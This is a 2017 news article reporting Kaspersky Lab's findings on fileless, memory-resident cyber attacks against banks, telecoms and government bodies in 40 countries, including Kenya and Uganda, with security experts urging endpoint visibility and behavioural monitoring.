Subscribe
  • Home
  • /
  • Open Source
  • /
  • Proper planning key to pre-empting invisible cyber attacks

Proper planning key to pre-empting invisible cyber attacks

Kgaogelo Letsebe
By Kgaogelo Letsebe, Portals journalist
Johannesburg, 13 Feb 2017
More than 140 enterprise networks in a range of business sectors in 40 countries have experienced "invisible" cyber attacks.
More than 140 enterprise networks in a range of business sectors in 40 countries have experienced "invisible" cyber attacks.

Visibility across your environment, proper security design of networks and actionable threat intelligence is the key to protecting your enterprise against "invisible" cyber-attacks.

This is according to John Mc Loughlin, managing director of J2 Software, in reaction to a Kaspersky Lab report on cyber criminals breaching more than 140 enterprise networks in a range of business sectors in 40 countries, including Kenya and Uganda.

According to the report, Kaspersky Lab experts discovered a series of "invisible" targeted attacks that use only legitimate software: widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows, dropping no malware files onto the hard drive, but hiding in the memory. This combined approach, the company reports, helps to avoid detection by whitelisting technologies, and leaves forensic investigators with almost no artefacts or malware samples to work with. The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot.

"The use of open source exploit code, common Windows utilities and unknown domains makes it almost impossible to determine the group responsible - or even whether it is a single group or several groups sharing the same tools. Known groups that have the most similar approaches are GCMAN and Carbanak," says Kasperky Lab.

ESET Research fellow Peter Kosinar says it is a mammoth task to track the attacks. "It is precisely the nature of being "invisible" which makes the actual infections more difficult to track... at least until they execute their intended malicious payload."

Mc Loughlin agrees, adding that it is possible this is far more prevalent than anybody knows simply due to the nature of the attacks. "I see the main targets are being called as banks, telecoms companies and government organisations. I am of the opinion that every single organisation or entity that makes use of electronic payment methods, collects credit card information or stores sensitive data on their networks and devices is a target."

Kasperky Lab points out recent victims included two banks, one telecom company, a financial institution, and three government entities in Kenya. In Uganda, attacks on only four financial institutions were reported.

Both Kosinar and Mc Loughlin say many of the tricks and best practices are already known as preventative measures but companies are failing to apply them thoroughly.

Mc Loughlin explains: "The problem with this and other cyber attacks is that the attackers are putting in more effort and have resources while the individual targets (companies) do not. It is important to have end point visibility and behavioural monitoring and alerting or remediating any breaches as they occur. With behavioural monitoring and visibility it makes no difference if the attack is on a hard drive, network or sitting in memory - changes are flagged, the source and destination of attacks are clearly marked and you have the ability to stop these in their tracks."

Share